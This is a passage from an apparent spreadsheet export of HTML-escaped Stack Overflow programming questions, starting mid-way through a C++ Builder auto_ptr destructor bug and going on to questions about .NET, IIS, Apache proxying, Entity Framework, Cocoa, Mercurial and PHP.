//  std::auto_ptr&amp;lt;A&amp;gt; b_;
//  std::auto_ptr&amp;lt;C&amp;gt; c_; // see expected output
};
#pragma argsused
int main(int argc, char* argv[])
{
    try
    {
        D d;
    }
    catch (...)
    {
        std::cout &amp;lt;&amp;lt; "caught exception" &amp;lt;&amp;lt; std::endl;
    }
    return 0;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;br&gt;
Expected:&lt;/p&gt;
&lt;pre&gt;
C::C() 1
C::C() 2
C::C() 3
C::~C() 3
C::~C() 2
C::~C() 1
caught exception
&lt;/pre&gt;
&lt;p&gt;&lt;br&gt;
Got:&lt;/p&gt;
&lt;pre&gt;
C::C() 1
C::C() 2
C::C() 3
C::~C() 2
C::~C() 1
caught exception
&lt;/pre&gt;
&lt;p&gt;&lt;br&gt;
Got (with line '&lt;code&gt;//  std::auto_ptr&amp;lt;C&amp;gt; c_;&lt;/code&gt;' uncommented):&lt;/p&gt;
&lt;pre&gt;
C::C() 1
C::C() 2
C::C() 3
C::~C() 1
caught exception
&lt;/pre&gt;
&lt;p&gt;&lt;br&gt;
&lt;strong&gt;Edit:&lt;/strong&gt; Made suggested changes
&lt;br&gt;&lt;br&gt;
&lt;strong&gt;Edit 2:&lt;/strong&gt;&lt;br&gt; 
I just tested it with C++ Builder 2007 (11.0.2902.10471), which shows the same problem. The release configuration works as soon as I check the "Debug information" box in Project -&gt; Options -&gt; C++ Compiler -&gt; Debugging. It surprises me that the executable gets smaller with "Debug information" enabled (down to 31.5 KB from 39.5 KB ).
&lt;br&gt;&lt;br&gt;
&lt;strong&gt;Edit 3:&lt;/strong&gt;&lt;br&gt; 
In Turbo C++ Explorer (C++ Builder 2006) (10.0.2288.42451) the release configuration works if I uncheck the "Inline function expansion (-vi)" box in Project -&gt; Options -&gt; C++ Compiler -&gt; Debugging. Replacing the first line (&lt;code&gt;#include &amp;lt;memory&amp;gt;&lt;/code&gt;) with the following code makes it work, too. &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;#pragma option push -vi-
#include &amp;lt;memory&amp;gt;
#pragma option pop
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Tool for diagnosing memory leaks in .NET (ASP.NET Application)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;we need a tool to detect easily memory leaks in an ASP.NET Application. We have an application, which consumes lot of memory.&lt;/p&gt;
&lt;p&gt;Thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Replicating C++'s RAII in C#</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm rolling my own logger class, and want to represent the heirarchy of logs as the app moves through different phases:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;log start
    loading
        loaded 400 values
    processing
         couldn't process var "x"
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;etc.&lt;/p&gt;
&lt;p&gt;In C++ (yes I know), I'd use RAII classlets that pushed themselves on the log stack when created, and popped off when they left the scope.  You could then leave functions at any point and still have consistent logging.&lt;/p&gt;
&lt;p&gt;Obviously in C# any variable has to be new'd, so it wouldn't be deleted until the next garbage collection cycle, and if you immediately create a new classlet, you could have an out-of-sync logger.&lt;/p&gt;
&lt;p&gt;How would people try to solve this problem in C#?  I want the logger syntax to be as unobtrusive to the current function as possible, and still support functions with multiple exit points.  &lt;/p&gt;
&lt;p&gt;The only solution I can think of off the top of my head involves closeHeirarchy() calls every return statement - and you know I'm going to miss one somewhere.&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;Edit:  I should make it clear I'm interested mainly in how you would replicate the RAII behaviour in c#.  Is there a mechanism that provides identical behaviour?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Route files with vbscript from a .net handler back to asp.dll</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We are migrating from asp classic to .net. Unfortunately they named all of the .asp files as .aspx so that they wouldn't lose page rank when they moved to .net. This means that IIS maps all .aspx files to asp.dll.&lt;/p&gt;
&lt;p&gt;After changing the mapping back I was going to try have a handler grab the request then check if there is any vbscript in the file and then hand it back to asp.dll if it otherwise proceed to handle the request normally.&lt;/p&gt;
&lt;p&gt;We are using IIS7.&lt;/p&gt;
&lt;p&gt;I think it may be possible to use a ISAPI filter to this too, but then i would have to learn how to make an ISAPI filter for IIS7 (which is fine if there isn't a way to this in .net)&lt;/p&gt;
&lt;p&gt;Ideas? Thanks!!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Using Apache proxy to foward traffic to tinyproxy</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to find a way to proxy some traffic on port 80 to tinyproxy running on a separate port. We have a client working behind a very strict firewall with only port 80 open (and cannot get to sites like meebo.com, etc). I was hoping I could create a CNAME to our domain and a virtual host on apache, catch the request for that new CNAME and forward the traffic right to tinyproxy running on the same box. &lt;/p&gt;
&lt;p&gt;I know tinyproxy is setup and working correctly, however, when I try to pass in my traffic through Apache, I don't even see any traffic. &lt;/p&gt;
&lt;p&gt;Does anyone have a proposed solution? Here is my VirtualHost entry:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;VirtualHost *:80&amp;gt;
    ServerName sub.domain.com
    ProxyPass / http://127.0.0.1:50001/
    ProxyPassReverse / http://127.0.0.1:50001/
&amp;lt;/VirtualHost&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;where Tinyproxy is running on port 50001.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>.NET Library to access the COM Port?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a library that would allow me to send and receive data on a Serial COM port?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to force ADO.NET Entity Framework to regenerate code?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've run into a snag with a ADO.NET Entity Framework model and a ADO.NET Data Service that is making it available.  The model and data service are compiling without any problems or warnings when they come out of source control.  However when I run the service I get the following error:
&lt;img src="http://i42.tinypic.com/5lds8p.jpg" alt="Request Error - The server encountered an error processing the request.  See server logs for more details." /&gt;&lt;/p&gt;
&lt;p&gt;Unfortunately there are no server logs (that I am aware of) since this is VS 2008 web dev server and there really isn't any code to debug.....  Through some trial and error it would appear that the generated code (model.Designer.cs) is out of date in some manner.  If I perform some trivial update to the EDM that forces it to regenerate the code file, when I rerun the service it works just fine.&lt;/p&gt;
&lt;p&gt;I've tried to delete the model.designer.cs file in the hopes that during the build the project/entity builder would detect the missing file and regenerate it for me.  That didn't happen..... Does anyone know how to force this code to be regenerated?  (It would also make me a bit happier about not having to keep generated code under source control.)&lt;/p&gt;
&lt;p&gt;Thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Should MVC Controller be in separate DLL?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've created a .NET winforms MVC.  The Controller and View are in the same EXE.  Model is in a set of DLLs that get used by several groups.  The MVC is very explicit.  Model knows nothing of Controller and Controller knows nothing of View.  I'm thinking to put the Controller in its own DLL so that it can be unit tested.  Highly unlike someone will reuse the controller.  Unit testing is the only reason &lt;em&gt;I have&lt;/em&gt; for the move into a DLL.&lt;/p&gt;
&lt;p&gt;Conceptually, should the controller always be in the same assembly as the View?  What are reasons for/against keeping them together?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What's the best way to trim whitespace from a string in Cocoa Touch?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm looking to determine whether a string value from a user input (UITextField) is "blank" if it's not nil.  Checking if &lt;code&gt;[textField.text isEqualToString:""]&lt;/code&gt; isn't quite enough because I want to avoid any blank/whitespace input (like say a few space characters).&lt;/p&gt;
&lt;p&gt;There does seem to be an indication of a good solution for my particular problem &lt;a href="http://stackoverflow.com/questions/422242/simple-string-parsing-in-cocoa-objective-c-parsing-a-command-line-into-command"&gt;in this StOv post&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Basically it goes something like this, but I suspect there has to (or ought to) be a better way:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;NSString *strResult;
NSScanner* scanner = [NSScanner scannerWithString:textField.text];
BOOL hasValidChars = [scanner scanUpToCharactersFromSet:[NSCharacterSet whitespaceAndNewlineCharacterSet] 
                                             intoString:&amp;amp;strResult];
// if hasValidChars == YES, we've got nonwhite space chars collected into strResult
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This clearly only works for my particular circumstance, and even then it would fail if the first character was a space but the data I wanted followed. So, I realize I've been a little spoiled by Ruby, but there must be a tried and true idiom for trimming strings in Cocoa.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Aaaand the answer is already out there, my apologies:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;NSString's &lt;code&gt;-stringByTrimmingCharactersInSet:&lt;/code&gt; would do it:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;Returns a new string made by removing
  from both ends of the receiver
  characters contained in a given
  character set.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;I'm still curious to hear if anybody has other/preferred ways of doing this.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I get PropertyChanged events to bubble up?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a hierarchy of objects (objects A, B), each of which implements &lt;code&gt;INotifyPropertyChanged&lt;/code&gt; such that...&lt;/p&gt;
&lt;p&gt;A has a member of type B,
B has a member of C, C is of type bool&lt;/p&gt;
&lt;p&gt;When C changes, its &lt;code&gt;PropertyChanged&lt;/code&gt; event gets fired, however this does not fire B's property changed event. And therefore A does not react to B's change.&lt;/p&gt;
&lt;p&gt;Is there a good way to bubble this up?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>In Java, how can I construct a "proxy wrapper" around an object which invokes a method upon changing a property?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm looking for something similar to the &lt;a href="http://en.wikipedia.org/wiki/Proxy_pattern" rel="nofollow"&gt;Proxy pattern&lt;/a&gt; or the &lt;a href="http://java.sun.com/j2se/1.3/docs/guide/reflection/proxy.html" rel="nofollow"&gt;Dynamic Proxy Classes&lt;/a&gt;, only that I don't want to intercept method calls before they are invoked on the real object, but rather I'd like to intercept properties that are being changed. I'd like the proxy to be able to represent multiple objects with different sets of properties. Something like &lt;a href="http://livedocs.adobe.com/flash/9.0/ActionScriptLangRefV3/flash/utils/Proxy.html" rel="nofollow"&gt;the Proxy class in Action Script 3&lt;/a&gt; would be fine.&lt;/p&gt;
&lt;p&gt;Here's what I want to achieve in general:&lt;/p&gt;
&lt;p&gt;I have a thread running with an object that manages a list of values (numbers, strings, objects) which were handed over by other threads in the program, so the class can take care of creating regular persistent snapshots on disk for the purpose of checkpointing the application. This persistor object manages a "dirty" flag that signifies whether the list of values has changed since the last checkpoint and needs to lock the list while it's busy writing it to disk.&lt;/p&gt;
&lt;p&gt;The persistor and the other components identify a particular item via a common name, so that when recovering from a crash, the other components can first check if the persistor has their latest copy saved and continue working where they left off.&lt;/p&gt;
&lt;p&gt;During normal operation, in order to work with the objects they handed over to the persistor, I want them to receive a reference to a proxy object that looks as if it were the original one, but whenever they change some value on it, the persistor notices and acts accordingly, for example by marking the item or the list as dirty before actually setting the real value.&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Edit&lt;/strong&gt;: Alternatively, are there generic setters (like in PHP 5) in Java, that is, a method that gets called if a property doesn't exist? Or is there a type of object that I can add properties to at runtime?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Should Exception Messages be Globalized</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm working on a project and I'm just starting to do all the work necessary to globalize the application. One thing that comes up quite often is whether to globalize the exception messages, but ensuring that string.Format uses CultureInfo.CurrentCulture instead of CultureInfo.InvariantCulture. Additionally this would mean that exception messages would be stored in resource files that can be marked as culture-specific.&lt;/p&gt;
&lt;p&gt;So the question is, should exception messages be globalized or should be be left in either the InvariantCulture or the author's country; in my case en-US.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Best Practice for Subversion and Image Uploads</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Running an ASP.Net website and using TinyMCE for content management.  Users need to be able to upload images for content.  The images will be shown in website content (news, articles, etc) but won't otherwise be referenced by anything aside from their content.&lt;/p&gt;
&lt;p&gt;Should these images be under version control (svn), or should the upload directory just be passed around when needed (backup, testing, etc)?  If they should be versioned, what's the best way to do this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What version of CE is Window Mobile 6.5 built on?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Windows Mobile 5 was based on CE 5.0.&lt;/p&gt;
&lt;p&gt;Windows Mobile 6 was based on CE 5.2.&lt;/p&gt;
&lt;p&gt;Does anyone know what version of CE is used by Windows Mobile 6.5?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Convert Pixels to Inches and vice versa in C#</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am looking to convert pixes to inches and vice versa. I understand that I need DPI, but I am not sure how to get this information (e.g. I don't have the &lt;code&gt;Graphics&lt;/code&gt; object, so that's not an option).&lt;/p&gt;
&lt;p&gt;Is there a way?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>boost vs ACE C++ cross platform performance comparison?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am involved in a venture that will port some communications, parsing, data handling functionality from Win32 to Linux and both will be supported.  The problem domain is very sensitive to throughput and performance.  &lt;/p&gt;
&lt;p&gt;I have very little experience with performance characteristics of boost and ACE.  Specifically we want to understand which library provides the best performance for threading.  &lt;/p&gt;
&lt;p&gt;Can anyone provide some data -- documented or word-of-mouth or perhaps some links -- about the relative performance between the two?&lt;/p&gt;
&lt;p&gt;EDIT&lt;/p&gt;
&lt;p&gt;Thanks all.  Confirmed our initial thoughts - we'll most likely choose boost for system level cross-platform stuff.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>The best way to clean your plugins out of eclipse 3.2</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Since the configuration manager and update manager for eclipse 3.2 is devoid of nice options for REMOVING or DELETING all my plugins it can be cumbersome to deal with needing to get your plugins in order. Just getting your dependencies worked out can be a nightmare when you have installed one version too high than you needed depending on the jdk version you are developing for.&lt;/p&gt;
&lt;p&gt;Other than trashing the files in the plugins and features directory (which sometimes works) what other options do we have in a M$ environment?&lt;/p&gt;
&lt;p&gt;In the situation where you are using RAD 7 you have to deal with the shared SDP70Shared folder too which is a bit ethereal as well.&lt;/p&gt;
&lt;p&gt;I want to see a fool proof way to clean house for regular eclipse 3.x, RAD, or any all in one package that will work.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Web frameworks</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Ruby On Rails, Django or ASP.NET MVC.&lt;/p&gt;
&lt;p&gt;Which is better? What are the pro's and con's?&lt;/p&gt;
&lt;p&gt;Just curious as to your opinion, please no flames.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Defining an Entity Framework 1:1 association</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to define a 1:1 association between two entities (one maps to a table and the other to a view - using DefinedQuery) in an Entity Framework model. 
When trying to define the mapping for this in the designer, it makes me choose the (1) table or view to map the association to. What am I supposed to choose? I can choose either of the two tables but then I am forced to choose a column from that table (or view) for each end of the relationship. I would expect to be able to choose a column from one table for one end of the association and a column from the other table for the other end of the association, but there's no way to do this.&lt;/p&gt;
&lt;p&gt;Here I've chosen to map to the "DW_ WF_ClaimInfo" view and it is forcing me to choose two columns from that view - one for each end of the relationship.&lt;/p&gt;
&lt;p&gt;I've also tried defining the mapping manually in the XML as follows:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;AssociationSetMapping Name="Entity1Entity2" TypeName="ClaimsModel.Entity1Entity2"
     StoreEntitySet="Entity1"&amp;gt;
  &amp;lt;EndProperty Name="Entity2"&amp;gt;
    &amp;lt;ScalarProperty Name="DOCUMENT" ColumnName="DOCUMENT" /&amp;gt;
  &amp;lt;/EndProperty&amp;gt;
  &amp;lt;EndProperty Name="Entity1"&amp;gt;
    &amp;lt;ScalarProperty Name="PK_DocumentId" ColumnName="PK_DocumentId" /&amp;gt;
  &amp;lt;/EndProperty&amp;gt;
&amp;lt;/AssociationSetMapping&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But this gives:
Error 2010: The Column 'DOCUMENT' specified as part of this MSL does not exist in MetadataWorkspace.
Seems like it still expects both columns to come from the same table, which doesn't make sense to me.&lt;/p&gt;
&lt;p&gt;Furthermore, if I select the same key for each end, e.g.:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;AssociationSetMapping Name="Entity1Entity2" TypeName="ClaimsModel.Entity1Entity2"
     StoreEntitySet="Entity1"&amp;gt;
  &amp;lt;EndProperty Name="Entity2"&amp;gt;
    &amp;lt;ScalarProperty Name="DOCUMENT" ColumnName="PK_DocumentId" /&amp;gt;
  &amp;lt;/EndProperty&amp;gt;
  &amp;lt;EndProperty Name="Entity1"&amp;gt;
    &amp;lt;ScalarProperty Name="PK_DocumentId" ColumnName="PK_DocumentId" /&amp;gt;
  &amp;lt;/EndProperty&amp;gt;
&amp;lt;/AssociationSetMapping&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I then get:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Error 3021: Problem in Mapping Fragment starting at line 675: Each of the following
columns in table AssignedClaims is mapped to multiple conceptual side properties:
  AssignedClaims.PK_DocumentId is mapped to
    &amp;lt;AssignedClaimDW_WF_ClaimInfo.DW_WF_ClaimInfo.DOCUMENT,
    AssignedClaimDW_WF_ClaimInfo.AssignedClaim.PK_DocumentId&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;What am I not getting?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Neural Network Structure</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am currently building a Neural Network library. I have constructed it as an object graph for simplicity. I am wondering if anyone can quantify the performance benefits of going to  an array based approach. What I have now works very good for building networks of close to arbitrary complexity. Regular (backpropped) networks as well as recurrent networks are supported. I am considering having trained networks "compile" into some "simpler" form such as arrays. &lt;/p&gt;
&lt;p&gt;I just wanted to see if anyone out there had any practical advice or experience building neural networks that deployed well into production. Is there any benefit to having the final product be array based instead of object graph based?&lt;/p&gt;
&lt;p&gt;P.S Memory footprint is less important than speed.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Visual Studio 2005 Search Memory</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I don't think this exists, but I'll throw this out there anyway.  Is it possible, while debugging, to search for a value in memory?&lt;/p&gt;
&lt;p&gt;For example, if I have a string "uniqueString" cached somewhere in memory, but I don't know under which variable it's stored--can I do a search for it?  As in, find out which variable(s) have "uniqueString" as their value?&lt;/p&gt;
&lt;p&gt;This is for C# managed code.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Halting in non-Turing-complete languages</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The halting problem cannot be solved for Turing complete languages and it can be solved trivially for some non-TC languages like regexes where it always halts. &lt;/p&gt;
&lt;p&gt;I was wondering if there are any languages that has both the ability to halt and not halt but admits an algorithm that can determine whether it halts.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What are the dimensions, file types, and ppi resolution of an iOS app icon?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What are the specifications for the icons required by Apple for a custom iPhone application published?&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;57x57, PNG, No Transparency, No Layers, 72 PPI&lt;/p&gt;
  &lt;p&gt;512x512, TIFF or JPEG, No Transparency, No Layers, 72 PPI&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Note: iPhone OS applies rounded corners, optionally shine, and other effects&lt;/p&gt;
&lt;p&gt;Also have a large version of your logo with the name of the application in case Apple contacts you needing a version for marketing purposes.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Shared Library Discovery</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am using C++ on Linux.  I want to dynamically bind a collection of unknown shared libraries.  I need my code to detect all the public functions exposed by the shared library and the string names of those functions.  How do I accomplish this task?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Writing to an iframe from NSTextView</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have built a web based WYSIWYG editor, which Im accessing programatically from my cocoa application. At the moment I'm able to run scripts and retrieve the HTML from the iFrame in the editor, but I'm unable to send text from an NSTextView to the iFrame. Any ideas?&lt;/p&gt;
&lt;p&gt;The editor is here &lt;a href="http://www.alexmillsdesign.com/Developer/FernEngine/" rel="nofollow"&gt;http://www.alexmillsdesign.com/Developer/FernEngine/&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Cheers
Alex Mills&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Operator overload</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;pre&gt;&lt;code&gt;class test {
public:
    test &amp;amp;operator=(const test &amp;amp; other){} // 1
    const test &amp;amp; operator+(const test&amp;amp; other) const {} // 2
    const test &amp;amp; operator+(int m) {} //3
private:
    int n;
};
int main()
{
test t1 , t2, t3;
// this works fine  t1 = t2.operator+(t3) , calls  2 and 1
t1 = t2 + t3; 
// this works fine    t1 = t2.operator+ (100). calls 3 and 1
t1 = t2 + 100;
//this works fine t1 = (t2.operator+ (100)).operator+ (t3)
t1 = t2 + 100 +t3;
//why is the error in this one  ????
// it should be t1 = (t2.operator+ (t3)).operator+ (100)
t1  =  t2 + t3 + 100; 
return 0;
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Changing the browser preference from JavaScript</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm having a problem with cookies. If the browser has cookies disabled, the cookie gets rejected. Is there a way to enable cookies on the client's browser that is compatible with Internet&amp;nbsp;Explorer, Firefox, Opera and Chrome?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Converting UTF-8 to WIN1252 using C++Builder 5</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have to import some UTF-8 encoded text-file into my C++Builder 5 program.
Are there any components or code samples to accomplish that?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>directx mouse click simulation</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How can I simulate the mouse click in a directx application?
mouse_event and PostMessage with WM_LBUTTONDOWN don't work...&lt;/p&gt;
&lt;p&gt;so it must be something to do with the DirectInput&lt;/p&gt;
&lt;p&gt;I haven't found out nothing useful with google, so you may be knowing the answer...&lt;/p&gt;
&lt;p&gt;thanks in advance&lt;/p&gt;
&lt;p&gt;//update&lt;/p&gt;
&lt;p&gt;I wrote the text wrongly, what I want is to make the directx app believe that the mouse has just clicked, but without effectively using the mouse and without using SendInput or mouse_event, which need that the window must be focused&lt;/p&gt;
</t>
  </si>
  <si>
    <t>ACL for a network device</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to implement ACL based authentication mechanism for a device. This device can be accessed through various interfaces like web pages, TL1 (basically through some command prompt) etc.&lt;/p&gt;
&lt;p&gt;I need to keep ACL logic centralized so that request from any interface can be authenticated. &lt;/p&gt;
&lt;p&gt;ACL logic would basically check whether the logged in user can perform the operation he is trying to perform. For this I will create groups and add users to these groups. Each group would maintain list of operation allowed under that particular group.&lt;/p&gt;
&lt;p&gt;Can someone suggest be the best way to implement this?&lt;/p&gt;
&lt;p&gt;Is there any existing software/tool that allows me to achieve this? Any open source project?&lt;/p&gt;
&lt;p&gt;I am a C/C++ programmer and a newbie to the ACL concept. Above mentioned module is to be developed for Linux OS. Web interface will be in CGI.&lt;/p&gt;
&lt;p&gt;Thanks in advance.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Mercurial: multiline commit message on the command line?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How can I specify a multiline commit message for mercurial on the command line?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;hg commit -m "* add foo\n* fix bar"
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;does not work.  The log shows:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;changeset:   13:f2c6526e5911
tag:         tip
date:        Fri Jan 23 23:22:36 2009 +0100
files:       foobar.cpp
description:
    * add foo\n*fix bar
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Php By Reference</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Can someone please explain what the "&amp;amp;" does in the following:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;class TEST {
}
$abc =&amp;amp; new TEST();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I know it is by reference. But can someone illustrate why and when I would need such a thing? Or point me to a url where this is explained well. I am unable to grasp the concept.&lt;/p&gt;
&lt;p&gt;Thank you very much.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>WPF databinding: database or objects?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to create this:&lt;/p&gt;
&lt;p&gt;Tag1 has the ordered list of objects: O1, O3, O2.
Tag2 has the ordered list of objects: O1, O4.&lt;/p&gt;
&lt;p&gt;Every time I click a tag, I want to see the list of objects. So clicking Tag1 would show in a listbox:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;O1&lt;/li&gt;
&lt;li&gt;O3&lt;/li&gt;
&lt;li&gt;O2&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;But I would like to &lt;strong&gt;keep the auto update so every time I edit or add/delete an object&lt;/strong&gt; it auto updates (I suppose I need to implement something like the interfaces &lt;code&gt;INotifyCollectionChanged&lt;/code&gt; and &lt;code&gt;INotifyPropertyChanged&lt;/code&gt;?).&lt;/p&gt;
&lt;p&gt;I could use a database and have the tables Tag, Object and TagObject, this last one with the TagID and ObjectID. But I also would like to avoid databases, since it's a desktop application.&lt;/p&gt;
&lt;p&gt;I could also use objects like &lt;code&gt;ObservableCollections&lt;/code&gt;, but I have the problem of having duplicate objects. I can use references to the objects but it gets messy.&lt;/p&gt;
&lt;p&gt;Anyone has any suggestion on how to do this?&lt;/p&gt;
&lt;p&gt;Thank you.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What do you suggest on how to stop hit counter for the same IP in asp.NET website?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;As you can see on the question, what is your advice about stoping hit counter for the same ip in ASP.NET web site ?&lt;/p&gt;
&lt;p&gt;Im my real estate project i increase the view count of a property when it is viewed. But i just want to increase it only if the user has a different ip. If the user refresh the page, the hit counter shouldn't be increased.&lt;/p&gt;
&lt;p&gt;Thanks in advance&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How well does F# perform compared to C#?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Of course both F# and C# compile to IL and the CLR JITter does most of the hard work, however I wanted to know whether there's anything implicit in the F# language or its core libraries which result in lesser performance compared to C#?&lt;/p&gt;
&lt;p&gt;Additionally, is there anything in the use of functional programming in the .net framework that might make it slower compared to C#?&lt;/p&gt;
&lt;p&gt;I am going to sit down and &lt;em&gt;measure&lt;/em&gt; differences of course, as that really is the only real way to know for sure, however I just wondered whether anybody had any broad-stroke knowledge on this topic.&lt;/p&gt;
&lt;h1&gt;See Also&lt;/h1&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="http://stackoverflow.com/questions/144227/c-f-performance-comparison"&gt;C# / F# Performance comparison&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://stackoverflow.com/questions/142985/is-a-program-f-any-more-efficient-execution-wise-than-c"&gt;Is a program F# any more efficient (execution-wise) than C#?&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
</t>
  </si>
  <si>
    <t>Add ADO.NET data tables to a blank MDB file</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How can I add several data tables that I've built in code, to a blank MDB file that ships with my application?&lt;/p&gt;
&lt;p&gt;I find it easy enough to connect to the MDB file via the OledbConnection object, but then I'm at a loss for an easy way to add my tables to it. There it sits, open and empty, but what is next?&lt;/p&gt;
&lt;p&gt;I can add my tables to a dataset easily enough, but I still don't see an easy way to map the dataset over to my open MDB file.&lt;/p&gt;
&lt;p&gt;Am I missing an easy fix for this? I'd like to avoid using &lt;a href="http://msdn.microsoft.com/en-us/library/ms803875" rel="nofollow"&gt;ADOX&lt;/a&gt; if possible. I also see that it is very easy to write the dataset out as XML, but I find no similar functionality for writing out an MDB file.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Scenarios where automated testing is unhelpful</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What are some situations where unit testing and TDD and the like are more trouble than they're worth?&lt;/p&gt;
&lt;p&gt;Some things I've come up with are:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;When generating test data is tricky: Sometimes, being able to come up with valid, non trivial test data is a challenge in itself.&lt;/li&gt;
&lt;li&gt;When the only practical way of verifying correctness of the code is to run it.&lt;/li&gt;
&lt;li&gt;When you're testing visual elements of the design.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;What are some other cases?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>beep in WinCE , it possible ?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;is it possible to make beep in WinCE ?&lt;/p&gt;
&lt;p&gt;i try and i get an error&lt;/p&gt;
</t>
  </si>
  <si>
